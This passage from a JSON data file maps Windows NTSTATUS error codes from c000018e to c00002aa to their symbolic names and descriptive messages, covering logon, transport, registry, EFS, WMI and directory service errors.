},\n        \"c000018e\": {\n            \"code\": \"STATUS_EVENTLOG_FILE_CORRUPT\",\n            \"description\": \"The Eventlog log file is corrupt.\"\n        },\n        \"c000018f\": {\n            \"code\": \"STATUS_EVENTLOG_CANT_START\",\n            \"description\": \"No Eventlog log file could be opened. The Eventlog service did not start.\"\n        },\n        \"c0000190\": {\n            \"code\": \"STATUS_TRUST_FAILURE\",\n            \"description\": \"The network logon failed. This might be because the validation authority cannot be reached.\"\n        },\n        \"c0000191\": {\n            \"code\": \"STATUS_MUTANT_LIMIT_EXCEEDED\",\n            \"description\": \"An attempt was made to acquire a mutant such that its maximum count would have been exceeded.\"\n        },\n        \"c0000192\": {\n            \"code\": \"STATUS_NETLOGON_NOT_STARTED\",\n            \"description\": \"An attempt was made to logon, but the NetLogon service was not started.\"\n        },\n        \"c0000193\": {\n            \"code\": \"STATUS_ACCOUNT_EXPIRED\",\n            \"description\": \"The user account has expired.\"\n        },\n        \"c0000194\": {\n            \"code\": \"STATUS_POSSIBLE_DEADLOCK\",\n            \"description\": \"{EXCEPTION} Possible deadlock condition.\"\n        },\n        \"c0000195\": {\n            \"code\": \"STATUS_NETWORK_CREDENTIAL_CONFLICT\",\n            \"description\": \"Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.\"\n        },\n        \"c0000196\": {\n            \"code\": \"STATUS_REMOTE_SESSION_LIMIT\",\n            \"description\": \"An attempt was made to establish a session to a network server, but there are already too many sessions established to that server.\"\n        },\n        \"c0000197\": {\n            \"code\": \"STATUS_EVENTLOG_FILE_CHANGED\",\n            \"description\": \"The log file has changed between reads.\"\n        },\n        \"c0000198\": {\n            \"code\": \"STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT\",\n            \"description\": \"The account used is an interdomain trust account. Use your global user account or local user account to access this server.\"\n        },\n        \"c0000199\": {\n            \"code\": \"STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT\",\n            \"description\": \"The account used is a computer account. Use your global user account or local user account to access this server.\"\n        },\n        \"c000019a\": {\n            \"code\": \"STATUS_NOLOGON_SERVER_TRUST_ACCOUNT\",\n            \"description\": \"The account used is a server trust account. Use your global user account or local user account to access this server.\"\n        },\n        \"c000019b\": {\n            \"code\": \"STATUS_DOMAIN_TRUST_INCONSISTENT\",\n            \"description\": \"The name or SID of the specified domain is inconsistent with the trust information for that domain.\"\n        },\n        \"c000019c\": {\n            \"code\": \"STATUS_FS_DRIVER_REQUIRED\",\n            \"description\": \"A volume has been accessed for which a file system driver is required that has not yet been loaded.\"\n        },\n        \"c000019d\": {\n            \"code\": \"STATUS_IMAGE_ALREADY_LOADED_AS_DLL\",\n            \"description\": \"Indicates that the specified image is already loaded as a DLL.\"\n        },\n        \"c000019e\": {\n            \"code\": \"STATUS_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING\",\n            \"description\": \"Short name settings cannot be changed on this volume due to the global registry setting.\"\n        },\n        \"c000019f\": {\n            \"code\": \"STATUS_SHORT_NAMES_NOT_ENABLED_ON_VOLUME\",\n            \"description\": \"Short names are not enabled on this volume.\"\n        },\n        \"c00001a0\": {\n            \"code\": \"STATUS_SECURITY_STREAM_IS_INCONSISTENT\",\n            \"description\": \"The security stream for the given volume is in an inconsistent state. Please run CHKDSK on the volume.\"\n        },\n        \"c00001a1\": {\n            \"code\": \"STATUS_INVALID_LOCK_RANGE\",\n            \"description\": \"A requested file lock operation cannot be processed due to an invalid byte range.\"\n        },\n        \"c00001a2\": {\n            \"code\": \"STATUS_INVALID_ACE_CONDITION\",\n            \"description\": \"The specified access control entry (ACE) contains an invalid condition.\"\n        },\n        \"c00001a3\": {\n            \"code\": \"STATUS_IMAGE_SUBSYSTEM_NOT_PRESENT\",\n            \"description\": \"The subsystem needed to support the image type is not present.\"\n        },\n        \"c00001a4\": {\n            \"code\": \"STATUS_NOTIFICATION_GUID_ALREADY_DEFINED\",\n            \"description\": \"The specified file already has a notification GUID associated with it.\"\n        },\n        \"c0000201\": {\n            \"code\": \"STATUS_NETWORK_OPEN_RESTRICTION\",\n            \"description\": \"A remote open failed because the network open restrictions were not satisfied.\"\n        },\n        \"c0000202\": {\n            \"code\": \"STATUS_NO_USER_SESSION_KEY\",\n            \"description\": \"There is no user session key for the specified logon session.\"\n        },\n        \"c0000203\": {\n            \"code\": \"STATUS_USER_SESSION_DELETED\",\n            \"description\": \"The remote user session has been deleted.\"\n        },\n        \"c0000204\": {\n            \"code\": \"STATUS_RESOURCE_LANG_NOT_FOUND\",\n            \"description\": \"Indicates the specified resource language ID cannot be found in the image file.\"\n        },\n        \"c0000205\": {\n            \"code\": \"STATUS_INSUFF_SERVER_RESOURCES\",\n            \"description\": \"Insufficient server resources exist to complete the request.\"\n        },\n        \"c0000206\": {\n            \"code\": \"STATUS_INVALID_BUFFER_SIZE\",\n            \"description\": \"The size of the buffer is invalid for the specified operation.\"\n        },\n        \"c0000207\": {\n            \"code\": \"STATUS_INVALID_ADDRESS_COMPONENT\",\n            \"description\": \"The transport rejected the specified network address as invalid.\"\n        },\n        \"c0000208\": {\n            \"code\": \"STATUS_INVALID_ADDRESS_WILDCARD\",\n            \"description\": \"The transport rejected the specified network address due to invalid use of a wildcard.\"\n        },\n        \"c0000209\": {\n            \"code\": \"STATUS_TOO_MANY_ADDRESSES\",\n            \"description\": \"The transport address could not be opened because all the available addresses are in use.\"\n        },\n        \"c000020a\": {\n            \"code\": \"STATUS_ADDRESS_ALREADY_EXISTS\",\n            \"description\": \"The transport address could not be opened because it already exists.\"\n        },\n        \"c000020b\": {\n            \"code\": \"STATUS_ADDRESS_CLOSED\",\n            \"description\": \"The transport address is now closed.\"\n        },\n        \"c000020c\": {\n            \"code\": \"STATUS_CONNECTION_DISCONNECTED\",\n            \"description\": \"The transport connection is now disconnected.\"\n        },\n        \"c000020d\": {\n            \"code\": \"STATUS_CONNECTION_RESET\",\n            \"description\": \"The transport connection has been reset.\"\n        },\n        \"c000020e\": {\n            \"code\": \"STATUS_TOO_MANY_NODES\",\n            \"description\": \"The transport cannot dynamically acquire any more nodes.\"\n        },\n        \"c000020f\": {\n            \"code\": \"STATUS_TRANSACTION_ABORTED\",\n            \"description\": \"The transport aborted a pending transaction.\"\n        },\n        \"c0000210\": {\n            \"code\": \"STATUS_TRANSACTION_TIMED_OUT\",\n            \"description\": \"The transport timed out a request that is waiting for a response.\"\n        },\n        \"c0000211\": {\n            \"code\": \"STATUS_TRANSACTION_NO_RELEASE\",\n            \"description\": \"The transport did not receive a release for a pending response.\"\n        },\n        \"c0000212\": {\n            \"code\": \"STATUS_TRANSACTION_NO_MATCH\",\n            \"description\": \"The transport did not find a transaction that matches the specific token.\"\n        },\n        \"c0000213\": {\n            \"code\": \"STATUS_TRANSACTION_RESPONDED\",\n            \"description\": \"The transport had previously responded to a transaction request.\"\n        },\n        \"c0000214\": {\n            \"code\": \"STATUS_TRANSACTION_INVALID_ID\",\n            \"description\": \"The transport does not recognize the specified transaction request ID.\"\n        },\n        \"c0000215\": {\n            \"code\": \"STATUS_TRANSACTION_INVALID_TYPE\",\n            \"description\": \"The transport does not recognize the specified transaction request type.\"\n        },\n        \"c0000216\": {\n            \"code\": \"STATUS_NOT_SERVER_SESSION\",\n            \"description\": \"The transport can only process the specified request on the server side of a session.\"\n        },\n        \"c0000217\": {\n            \"code\": \"STATUS_NOT_CLIENT_SESSION\",\n            \"description\": \"The transport can only process the specified request on the client side of a session.\"\n        },\n        \"c0000218\": {\n            \"code\": \"STATUS_CANNOT_LOAD_REGISTRY_FILE\",\n            \"description\": \"{Registry File Failure} The registry cannot load the hive (file): %hs or its log or alternate. It is corrupt, absent, or not writable.\"\n        },\n        \"c0000219\": {\n            \"code\": \"STATUS_DEBUG_ATTACH_FAILED\",\n            \"description\": \"{Unexpected Failure in DebugActiveProcess} An unexpected failure occurred while processing a DebugActiveProcess API request. Choosing OK will terminate the process, and choosing Cancel will ignore the error.\"\n        },\n        \"c000021a\": {\n            \"code\": \"STATUS_SYSTEM_PROCESS_TERMINATED\",\n            \"description\": \"{Fatal System Error} The %hs system process terminated unexpectedly with a status of 0x%08x (0x%08x 0x%08x). The system has been shut down.\"\n        },\n        \"c000021b\": {\n            \"code\": \"STATUS_DATA_NOT_ACCEPTED\",\n            \"description\": \"{Data Not Accepted} The TDI client could not handle the data received during an indication.\"\n        },\n        \"c000021c\": {\n            \"code\": \"STATUS_NO_BROWSER_SERVERS_FOUND\",\n            \"description\": \"{Unable to Retrieve Browser Server List} The list of servers for this workgroup is not currently available.\"\n        },\n        \"c000021d\": {\n            \"code\": \"STATUS_VDM_HARD_ERROR\",\n            \"description\": \"NTVDM encountered a hard error.\"\n        },\n        \"c000021e\": {\n            \"code\": \"STATUS_DRIVER_CANCEL_TIMEOUT\",\n            \"description\": \"{Cancel Timeout} The driver %hs failed to complete a canceled I/O request in the allotted time.\"\n        },\n        \"c000021f\": {\n            \"code\": \"STATUS_REPLY_MESSAGE_MISMATCH\",\n            \"description\": \"{Reply Message Mismatch} An attempt was made to reply to an LPC message, but the thread specified by the client ID in the message was not waiting on that message.\"\n        },\n        \"c0000220\": {\n            \"code\": \"STATUS_MAPPED_ALIGNMENT\",\n            \"description\": \"{Mapped View Alignment Incorrect} An attempt was made to map a view of a file, but either the specified base address or the offset into the file were not aligned on the proper allocation granularity.\"\n        },\n        \"c0000221\": {\n            \"code\": \"STATUS_IMAGE_CHECKSUM_MISMATCH\",\n            \"description\": \"{Bad Image Checksum} The image %hs is possibly corrupt. The header checksum does not match the computed checksum.\"\n        },\n        \"c0000222\": {\n            \"code\": \"STATUS_LOST_WRITEBEHIND_DATA\",\n            \"description\": \"{Delayed Write Failed} Windows was unable to save all the data for the file %hs. The data has been lost. This error might be caused by a failure of your computer hardware or network connection. Try to save this file elsewhere.\"\n        },\n        \"c0000223\": {\n            \"code\": \"STATUS_CLIENT_SERVER_PARAMETERS_INVALID\",\n            \"description\": \"The parameters passed to the server in the client/server shared memory window were invalid. Too much data might have been put in the shared memory window.\"\n        },\n        \"c0000224\": {\n            \"code\": \"STATUS_PASSWORD_MUST_CHANGE\",\n            \"description\": \"The user password must be changed before logging on the first time.\"\n        },\n        \"c0000225\": {\n            \"code\": \"STATUS_NOT_FOUND\",\n            \"description\": \"The object was not found.\"\n        },\n        \"c0000226\": {\n            \"code\": \"STATUS_NOT_TINY_STREAM\",\n            \"description\": \"The stream is not a tiny stream.\"\n        },\n        \"c0000227\": {\n            \"code\": \"STATUS_RECOVERY_FAILURE\",\n            \"description\": \"A transaction recovery failed.\"\n        },\n        \"c0000228\": {\n            \"code\": \"STATUS_STACK_OVERFLOW_READ\",\n            \"description\": \"The request must be handled by the stack overflow code.\"\n        },\n        \"c0000229\": {\n            \"code\": \"STATUS_FAIL_CHECK\",\n            \"description\": \"A consistency check failed.\"\n        },\n        \"c000022a\": {\n            \"code\": \"STATUS_DUPLICATE_OBJECTID\",\n            \"description\": \"The attempt to insert the ID in the index failed because the ID is already in the index.\"\n        },\n        \"c000022b\": {\n            \"code\": \"STATUS_OBJECTID_EXISTS\",\n            \"description\": \"The attempt to set the object ID failed because the object already has an ID.\"\n        },\n        \"c000022c\": {\n            \"code\": \"STATUS_CONVERT_TO_LARGE\",\n            \"description\": \"Internal OFS status codes indicating how an allocation operation is handled. Either it is retried after the containing oNode is moved or the extent stream is converted to a large stream.\"\n        },\n        \"c000022d\": {\n            \"code\": \"STATUS_RETRY\",\n            \"description\": \"The request needs to be retried.\"\n        },\n        \"c000022e\": {\n            \"code\": \"STATUS_FOUND_OUT_OF_SCOPE\",\n            \"description\": \"The attempt to find the object found an object on the volume that matches by ID; however, it is out of the scope of the handle that is used for the operation.\"\n        },\n        \"c000022f\": {\n            \"code\": \"STATUS_ALLOCATE_BUCKET\",\n            \"description\": \"The bucket array must be grown. Retry the transaction after doing so.\"\n        },\n        \"c0000230\": {\n            \"code\": \"STATUS_PROPSET_NOT_FOUND\",\n            \"description\": \"The specified property set does not exist on the object.\"\n        },\n        \"c0000231\": {\n            \"code\": \"STATUS_MARSHALL_OVERFLOW\",\n            \"description\": \"The user/kernel marshaling buffer has overflowed.\"\n        },\n        \"c0000232\": {\n            \"code\": \"STATUS_INVALID_VARIANT\",\n            \"description\": \"The supplied variant structure contains invalid data.\"\n        },\n        \"c0000233\": {\n            \"code\": \"STATUS_DOMAIN_CONTROLLER_NOT_FOUND\",\n            \"description\": \"A domain controller for this domain was not found.\"\n        },\n        \"c0000234\": {\n            \"code\": \"STATUS_ACCOUNT_LOCKED_OUT\",\n            \"description\": \"The user account has been automatically locked because too many invalid logon attempts or password change attempts have been requested.\"\n        },\n        \"c0000235\": {\n            \"code\": \"STATUS_HANDLE_NOT_CLOSABLE\",\n            \"description\": \"NtClose was called on a handle that was protected from close via NtSetInformationObject.\"\n        },\n        \"c0000236\": {\n            \"code\": \"STATUS_CONNECTION_REFUSED\",\n            \"description\": \"The transport-connection attempt was refused by the remote system.\"\n        },\n        \"c0000237\": {\n            \"code\": \"STATUS_GRACEFUL_DISCONNECT\",\n            \"description\": \"The transport connection was gracefully closed.\"\n        },\n        \"c0000238\": {\n            \"code\": \"STATUS_ADDRESS_ALREADY_ASSOCIATED\",\n            \"description\": \"The transport endpoint already has an address associated with it.\"\n        },\n        \"c0000239\": {\n            \"code\": \"STATUS_ADDRESS_NOT_ASSOCIATED\",\n            \"description\": \"An address has not yet been associated with the transport endpoint.\"\n        },\n        \"c000023a\": {\n            \"code\": \"STATUS_CONNECTION_INVALID\",\n            \"description\": \"An operation was attempted on a nonexistent transport connection.\"\n        },\n        \"c000023b\": {\n            \"code\": \"STATUS_CONNECTION_ACTIVE\",\n            \"description\": \"An invalid operation was attempted on an active transport connection.\"\n        },\n        \"c000023c\": {\n            \"code\": \"STATUS_NETWORK_UNREACHABLE\",\n            \"description\": \"The remote network is not reachable by the transport.\"\n        },\n        \"c000023d\": {\n            \"code\": \"STATUS_HOST_UNREACHABLE\",\n            \"description\": \"The remote system is not reachable by the transport.\"\n        },\n        \"c000023e\": {\n            \"code\": \"STATUS_PROTOCOL_UNREACHABLE\",\n            \"description\": \"The remote system does not support the transport protocol.\"\n        },\n        \"c000023f\": {\n            \"code\": \"STATUS_PORT_UNREACHABLE\",\n            \"description\": \"No service is operating at the destination port of the transport on the remote system.\"\n        },\n        \"c0000240\": {\n            \"code\": \"STATUS_REQUEST_ABORTED\",\n            \"description\": \"The request was aborted.\"\n        },\n        \"c0000241\": {\n            \"code\": \"STATUS_CONNECTION_ABORTED\",\n            \"description\": \"The transport connection was aborted by the local system.\"\n        },\n        \"c0000242\": {\n            \"code\": \"STATUS_BAD_COMPRESSION_BUFFER\",\n            \"description\": \"The specified buffer contains ill-formed data.\"\n        },\n        \"c0000243\": {\n            \"code\": \"STATUS_USER_MAPPED_FILE\",\n            \"description\": \"The requested operation cannot be performed on a file with a user mapped section open.\"\n        },\n        \"c0000244\": {\n            \"code\": \"STATUS_AUDIT_FAILED\",\n            \"description\": \"{Audit Failed} An attempt to generate a security audit failed.\"\n        },\n        \"c0000245\": {\n            \"code\": \"STATUS_TIMER_RESOLUTION_NOT_SET\",\n            \"description\": \"The timer resolution was not previously set by the current process.\"\n        },\n        \"c0000246\": {\n            \"code\": \"STATUS_CONNECTION_COUNT_LIMIT\",\n            \"description\": \"A connection to the server could not be made because the limit on the number of concurrent connections for this account has been reached.\"\n        },\n        \"c0000247\": {\n            \"code\": \"STATUS_LOGIN_TIME_RESTRICTION\",\n            \"description\": \"Attempting to log on during an unauthorized time of day for this account.\"\n        },\n        \"c0000248\": {\n            \"code\": \"STATUS_LOGIN_WKSTA_RESTRICTION\",\n            \"description\": \"The account is not authorized to log on from this station.\"\n        },\n        \"c0000249\": {\n            \"code\": \"STATUS_IMAGE_MP_UP_MISMATCH\",\n            \"description\": \"{UP/MP Image Mismatch} The image %hs has been modified for use on a uniprocessor system, but you are running it on a multiprocessor machine. Reinstall the image file.\"\n        },\n        \"c0000250\": {\n            \"code\": \"STATUS_INSUFFICIENT_LOGON_INFO\",\n            \"description\": \"There is insufficient account information to log you on.\"\n        },\n        \"c0000251\": {\n            \"code\": \"STATUS_BAD_DLL_ENTRYPOINT\",\n            \"description\": \"{Invalid DLL Entrypoint} The dynamic link library %hs is not written correctly. The stack pointer has been left in an inconsistent state. The entry point should be declared as WINAPI or STDCALL. Select YES to fail the DLL load. Select NO to continue execution. Selecting NO might cause the application to operate incorrectly.\"\n        },\n        \"c0000252\": {\n            \"code\": \"STATUS_BAD_SERVICE_ENTRYPOINT\",\n            \"description\": \"{Invalid Service Callback Entrypoint} The %hs service is not written correctly. The stack pointer has been left in an inconsistent state. The callback entry point should be declared as WINAPI or STDCALL. Selecting OK will cause the service to continue operation. However, the service process might operate incorrectly.\"\n        },\n        \"c0000253\": {\n            \"code\": \"STATUS_LPC_REPLY_LOST\",\n            \"description\": \"The server received the messages but did not send a reply.\"\n        },\n        \"c0000254\": {\n            \"code\": \"STATUS_IP_ADDRESS_CONFLICT1\",\n            \"description\": \"There is an IP address conflict with another system on the network.\"\n        },\n        \"c0000255\": {\n            \"code\": \"STATUS_IP_ADDRESS_CONFLICT2\",\n            \"description\": \"There is an IP address conflict with another system on the network.\"\n        },\n        \"c0000256\": {\n            \"code\": \"STATUS_REGISTRY_QUOTA_LIMIT\",\n            \"description\": \"{Low On Registry Space} The system has reached the maximum size that is allowed for the system part of the registry. Additional storage requests will be ignored.\"\n        },\n        \"c0000257\": {\n            \"code\": \"STATUS_PATH_NOT_COVERED\",\n            \"description\": \"The contacted server does not support the indicated part of the DFS namespace.\"\n        },\n        \"c0000258\": {\n            \"code\": \"STATUS_NO_CALLBACK_ACTIVE\",\n            \"description\": \"A callback return system service cannot be executed when no callback is active.\"\n        },\n        \"c0000259\": {\n            \"code\": \"STATUS_LICENSE_QUOTA_EXCEEDED\",\n            \"description\": \"The service being accessed is licensed for a particular number of connections. No more connections can be made to the service at this time because the service has already accepted the maximum number of connections.\"\n        },\n        \"c000025a\": {\n            \"code\": \"STATUS_PWD_TOO_SHORT\",\n            \"description\": \"The password provided is too short to meet the policy of your user account. Choose a longer password.\"\n        },\n        \"c000025b\": {\n            \"code\": \"STATUS_PWD_TOO_RECENT\",\n            \"description\": \"The policy of your user account does not allow you to change passwords too frequently. This is done to prevent users from changing back to a familiar, but potentially discovered, password. If you feel your password has been compromised, contact your administrator immediately to have a new one assigned.\"\n        },\n        \"c000025c\": {\n            \"code\": \"STATUS_PWD_HISTORY_CONFLICT\",\n            \"description\": \"You have attempted to change your password to one that you have used in the past. The policy of your user account does not allow this. Select a password that you have not previously used.\"\n        },\n        \"c000025e\": {\n            \"code\": \"STATUS_PLUGPLAY_NO_DEVICE\",\n            \"description\": \"You have attempted to load a legacy device driver while its device instance had been disabled.\"\n        },\n        \"c000025f\": {\n            \"code\": \"STATUS_UNSUPPORTED_COMPRESSION\",\n            \"description\": \"The specified compression format is unsupported.\"\n        },\n        \"c0000260\": {\n            \"code\": \"STATUS_INVALID_HW_PROFILE\",\n            \"description\": \"The specified hardware profile configuration is invalid.\"\n        },\n        \"c0000261\": {\n            \"code\": \"STATUS_INVALID_PLUGPLAY_DEVICE_PATH\",\n            \"description\": \"The specified Plug and Play registry device path is invalid.\"\n        },\n        \"c0000262\": {\n            \"code\": \"STATUS_DRIVER_ORDINAL_NOT_FOUND\",\n            \"description\": \"{Driver Entry Point Not Found} The %hs device driver could not locate the ordinal %ld in driver %hs.\"\n        },\n        \"c0000263\": {\n            \"code\": \"STATUS_DRIVER_ENTRYPOINT_NOT_FOUND\",\n            \"description\": \"{Driver Entry Point Not Found} The %hs device driver could not locate the entry point %hs in driver %hs.\"\n        },\n        \"c0000264\": {\n            \"code\": \"STATUS_RESOURCE_NOT_OWNED\",\n            \"description\": \"{Application Error} The application attempted to release a resource it did not own. Click OK to terminate the application.\"\n        },\n        \"c0000265\": {\n            \"code\": \"STATUS_TOO_MANY_LINKS\",\n            \"description\": \"An attempt was made to create more links on a file than the file system supports.\"\n        },\n        \"c0000266\": {\n            \"code\": \"STATUS_QUOTA_LIST_INCONSISTENT\",\n            \"description\": \"The specified quota list is internally inconsistent with its descriptor.\"\n        },\n        \"c0000267\": {\n            \"code\": \"STATUS_FILE_IS_OFFLINE\",\n            \"description\": \"The specified file has been relocated to offline storage.\"\n        },\n        \"c0000268\": {\n            \"code\": \"STATUS_EVALUATION_EXPIRATION\",\n            \"description\": \"{Windows Evaluation Notification} The evaluation period for this installation of Windows has expired. This system will shutdown in 1 hour. To restore access to this installation of Windows, upgrade this installation by using a licensed distribution of this product.\"\n        },\n        \"c0000269\": {\n            \"code\": \"STATUS_ILLEGAL_DLL_RELOCATION\",\n            \"description\": \"{Illegal System DLL Relocation} The system DLL %hs was relocated in memory. The application will not run properly. The relocation occurred because the DLL %hs occupied an address range that is reserved for Windows system DLLs. The vendor supplying the DLL should be contacted for a new DLL.\"\n        },\n        \"c000026a\": {\n            \"code\": \"STATUS_LICENSE_VIOLATION\",\n            \"description\": \"{License Violation} The system has detected tampering with your registered product type. This is a violation of your software license. Tampering with the product type is not permitted.\"\n        },\n        \"c000026b\": {\n            \"code\": \"STATUS_DLL_INIT_FAILED_LOGOFF\",\n            \"description\": \"{DLL Initialization Failed} The application failed to initialize because the window station is shutting down.\"\n        },\n        \"c000026c\": {\n            \"code\": \"STATUS_DRIVER_UNABLE_TO_LOAD\",\n            \"description\": \"{Unable to Load Device Driver} %hs device driver could not be loaded. Error Status was 0x%x.\"\n        },\n        \"c000026d\": {\n            \"code\": \"STATUS_DFS_UNAVAILABLE\",\n            \"description\": \"DFS is unavailable on the contacted server.\"\n        },\n        \"c000026e\": {\n            \"code\": \"STATUS_VOLUME_DISMOUNTED\",\n            \"description\": \"An operation was attempted to a volume after it was dismounted.\"\n        },\n        \"c000026f\": {\n            \"code\": \"STATUS_WX86_INTERNAL_ERROR\",\n            \"description\": \"An internal error occurred in the Win32 x86 emulation subsystem.\"\n        },\n        \"c0000270\": {\n            \"code\": \"STATUS_WX86_FLOAT_STACK_CHECK\",\n            \"description\": \"Win32 x86 emulation subsystem floating-point stack check.\"\n        },\n        \"c0000271\": {\n            \"code\": \"STATUS_VALIDATE_CONTINUE\",\n            \"description\": \"The validation process needs to continue on to the next step.\"\n        },\n        \"c0000272\": {\n            \"code\": \"STATUS_NO_MATCH\",\n            \"description\": \"There was no match for the specified key in the index.\"\n        },\n        \"c0000273\": {\n            \"code\": \"STATUS_NO_MORE_MATCHES\",\n            \"description\": \"There are no more matches for the current index enumeration.\"\n        },\n        \"c0000275\": {\n            \"code\": \"STATUS_NOT_A_REPARSE_POINT\",\n            \"description\": \"The NTFS file or directory is not a reparse point.\"\n        },\n        \"c0000276\": {\n            \"code\": \"STATUS_IO_REPARSE_TAG_INVALID\",\n            \"description\": \"The Windows I/O reparse tag passed for the NTFS reparse point is invalid.\"\n        },\n        \"c0000277\": {\n            \"code\": \"STATUS_IO_REPARSE_TAG_MISMATCH\",\n            \"description\": \"The Windows I/O reparse tag does not match the one that is in the NTFS reparse point.\"\n        },\n        \"c0000278\": {\n            \"code\": \"STATUS_IO_REPARSE_DATA_INVALID\",\n            \"description\": \"The user data passed for the NTFS reparse point is invalid.\"\n        },\n        \"c0000279\": {\n            \"code\": \"STATUS_IO_REPARSE_TAG_NOT_HANDLED\",\n            \"description\": \"The layered file system driver for this I/O tag did not handle it when needed.\"\n        },\n        \"c0000280\": {\n            \"code\": \"STATUS_REPARSE_POINT_NOT_RESOLVED\",\n            \"description\": \"The NTFS symbolic link could not be resolved even though the initial file name is valid.\"\n        },\n        \"c0000281\": {\n            \"code\": \"STATUS_DIRECTORY_IS_A_REPARSE_POINT\",\n            \"description\": \"The NTFS directory is a reparse point.\"\n        },\n        \"c0000282\": {\n            \"code\": \"STATUS_RANGE_LIST_CONFLICT\",\n            \"description\": \"The range could not be added to the range list because of a conflict.\"\n        },\n        \"c0000283\": {\n            \"code\": \"STATUS_SOURCE_ELEMENT_EMPTY\",\n            \"description\": \"The specified medium changer source element contains no media.\"\n        },\n        \"c0000284\": {\n            \"code\": \"STATUS_DESTINATION_ELEMENT_FULL\",\n            \"description\": \"The specified medium changer destination element already contains media.\"\n        },\n        \"c0000285\": {\n            \"code\": \"STATUS_ILLEGAL_ELEMENT_ADDRESS\",\n            \"description\": \"The specified medium changer element does not exist.\"\n        },\n        \"c0000286\": {\n            \"code\": \"STATUS_MAGAZINE_NOT_PRESENT\",\n            \"description\": \"The specified element is contained in a magazine that is no longer present.\"\n        },\n        \"c0000287\": {\n            \"code\": \"STATUS_REINITIALIZATION_NEEDED\",\n            \"description\": \"The device requires re-initialization due to hardware errors.\"\n        },\n        \"c000028a\": {\n            \"code\": \"STATUS_ENCRYPTION_FAILED\",\n            \"description\": \"The file encryption attempt failed.\"\n        },\n        \"c000028b\": {\n            \"code\": \"STATUS_DECRYPTION_FAILED\",\n            \"description\": \"The file decryption attempt failed.\"\n        },\n        \"c000028c\": {\n            \"code\": \"STATUS_RANGE_NOT_FOUND\",\n            \"description\": \"The specified range could not be found in the range list.\"\n        },\n        \"c000028d\": {\n            \"code\": \"STATUS_NO_RECOVERY_POLICY\",\n            \"description\": \"There is no encryption recovery policy configured for this system.\"\n        },\n        \"c000028e\": {\n            \"code\": \"STATUS_NO_EFS\",\n            \"description\": \"The required encryption driver is not loaded for this system.\"\n        },\n        \"c000028f\": {\n            \"code\": \"STATUS_WRONG_EFS\",\n            \"description\": \"The file was encrypted with a different encryption driver than is currently loaded.\"\n        },\n        \"c0000290\": {\n            \"code\": \"STATUS_NO_USER_KEYS\",\n            \"description\": \"There are no EFS keys defined for the user.\"\n        },\n        \"c0000291\": {\n            \"code\": \"STATUS_FILE_NOT_ENCRYPTED\",\n            \"description\": \"The specified file is not encrypted.\"\n        },\n        \"c0000292\": {\n            \"code\": \"STATUS_NOT_EXPORT_FORMAT\",\n            \"description\": \"The specified file is not in the defined EFS export format.\"\n        },\n        \"c0000293\": {\n            \"code\": \"STATUS_FILE_ENCRYPTED\",\n            \"description\": \"The specified file is encrypted and the user does not have the ability to decrypt it.\"\n        },\n        \"c0000295\": {\n            \"code\": \"STATUS_WMI_GUID_NOT_FOUND\",\n            \"description\": \"The GUID passed was not recognized as valid by a WMI data provider.\"\n        },\n        \"c0000296\": {\n            \"code\": \"STATUS_WMI_INSTANCE_NOT_FOUND\",\n            \"description\": \"The instance name passed was not recognized as valid by a WMI data provider.\"\n        },\n        \"c0000297\": {\n            \"code\": \"STATUS_WMI_ITEMID_NOT_FOUND\",\n            \"description\": \"The data item ID passed was not recognized as valid by a WMI data provider.\"\n        },\n        \"c0000298\": {\n            \"code\": \"STATUS_WMI_TRY_AGAIN\",\n            \"description\": \"The WMI request could not be completed and should be retried.\"\n        },\n        \"c0000299\": {\n            \"code\": \"STATUS_SHARED_POLICY\",\n            \"description\": \"The policy object is shared and can only be modified at the root.\"\n        },\n        \"c000029a\": {\n            \"code\": \"STATUS_POLICY_OBJECT_NOT_FOUND\",\n            \"description\": \"The policy object does not exist when it should.\"\n        },\n        \"c000029b\": {\n            \"code\": \"STATUS_POLICY_ONLY_IN_DS\",\n            \"description\": \"The requested policy information only lives in the Ds.\"\n        },\n        \"c000029c\": {\n            \"code\": \"STATUS_VOLUME_NOT_UPGRADED\",\n            \"description\": \"The volume must be upgraded to enable this feature.\"\n        },\n        \"c000029d\": {\n            \"code\": \"STATUS_REMOTE_STORAGE_NOT_ACTIVE\",\n            \"description\": \"The remote storage service is not operational at this time.\"\n        },\n        \"c000029e\": {\n            \"code\": \"STATUS_REMOTE_STORAGE_MEDIA_ERROR\",\n            \"description\": \"The remote storage service encountered a media error.\"\n        },\n        \"c000029f\": {\n            \"code\": \"STATUS_NO_TRACKING_SERVICE\",\n            \"description\": \"The tracking (workstation) service is not running.\"\n        },\n        \"c00002a0\": {\n            \"code\": \"STATUS_SERVER_SID_MISMATCH\",\n            \"description\": \"The server process is running under a SID that is different from the SID that is required by client.\"\n        },\n        \"c00002a1\": {\n            \"code\": \"STATUS_DS_NO_ATTRIBUTE_OR_VALUE\",\n            \"description\": \"The specified directory service attribute or value does not exist.\"\n        },\n        \"c00002a2\": {\n            \"code\": \"STATUS_DS_INVALID_ATTRIBUTE_SYNTAX\",\n            \"description\": \"The attribute syntax specified to the directory service is invalid.\"\n        },\n        \"c00002a3\": {\n            \"code\": \"STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED\",\n            \"description\": \"The attribute type specified to the directory service is not defined.\"\n        },\n        \"c00002a4\": {\n            \"code\": \"STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS\",\n            \"description\": \"The specified directory service attribute or value already exists.\"\n        },\n        \"c00002a5\": {\n            \"code\": \"STATUS_DS_BUSY\",\n            \"description\": \"The directory service is busy.\"\n        },\n        \"c00002a6\": {\n            \"code\": \"STATUS_DS_UNAVAILABLE\",\n            \"description\": \"The directory service is unavailable.\"\n        },\n        \"c00002a7\": {\n            \"code\": \"STATUS_DS_NO_RIDS_ALLOCATED\",\n            \"description\": \"The directory service was unable to allocate a relative identifier.\"\n        },\n        \"c00002a8\": {\n            \"code\": \"STATUS_DS_NO_MORE_RIDS\",\n            \"description\": \"The directory service has exhausted the pool of relative identifiers.\"\n        },\n        \"c00002a9\": {\n            \"code\": \"STATUS_DS_INCORRECT_ROLE_OWNER\",\n            \"description\": \"The requested operation could not be performed because the directory service is not the master for that type of operation.\"\n        },\n        \"c00002aa\": {\n            \"code\": \"STATUS_DS_RIDMGR_INIT_ERROR\",\n            \"description\": \"The directory service was unable to initialize the subsystem that allocates relative identifiers.\"\n        },\n        